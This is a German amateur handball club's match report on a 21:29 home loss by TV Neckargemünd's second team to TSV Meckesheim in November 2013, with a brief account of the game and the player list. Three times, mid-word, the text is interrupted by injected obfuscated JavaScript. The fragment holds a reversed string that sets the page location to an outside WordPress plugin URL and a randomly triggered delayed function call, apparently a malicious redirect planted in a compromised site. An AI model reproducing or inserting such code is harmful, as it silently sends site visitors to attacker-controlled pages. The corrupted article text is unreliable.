Herren II: Tabellenführer klar überlegen

TV Neckargemünd 2 – TSV Meckesheim: 21:29 (9:17)
Neckargemünd, 18.11.13 (bki) – Im letzten Heimspiel des Jahres 2013 hatten wir die Mannschaft aus Meckesheim zu Gast und damit auch einige alte Bekannte. Denn mit Fabian Mitsch, Marc Hoffmann und Marc Leibenguth kamen drei Spieler, die letzte Saison noch das Trikot des TVN übergestreift hatten.

Die Gäste waren bis datoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to ungeschlagen und entsprechend begann die Partie.
Wir fanden zu keinem Zeitpunkt ins Spiel. Vorne gelangen keine Tore und in der Abwehr bekamen wir keine Bälle zu fassen. So ging Meckesheim mit 4:10 in Führung und konnte diese im Laufe der ersten Hälfte auf 9:17 ausbauen.
Nach dem Pausentee schalteten die Gäste einen Gang zurück und wir konnten mit einer spürbaren Steigerung die Niederlage einigermaßen erträglich gestalten.
Es spielten:
Im Tor: Michael Hechelhammer, Bastian Kirschmer
Im Feld: Alexander Stephan (4), Ulrich Weitzel (2/2), Christoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toph Schmidt (4), Istoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok Golic (1), Bernd Wolfbeiß, Tobias Coelljan (1/1), Nils Berner, Joachim Hermstedt (2), Jann Thieme (4), Michael Lichtl, Niclas Heinze (1), Simon Kronbichler (1)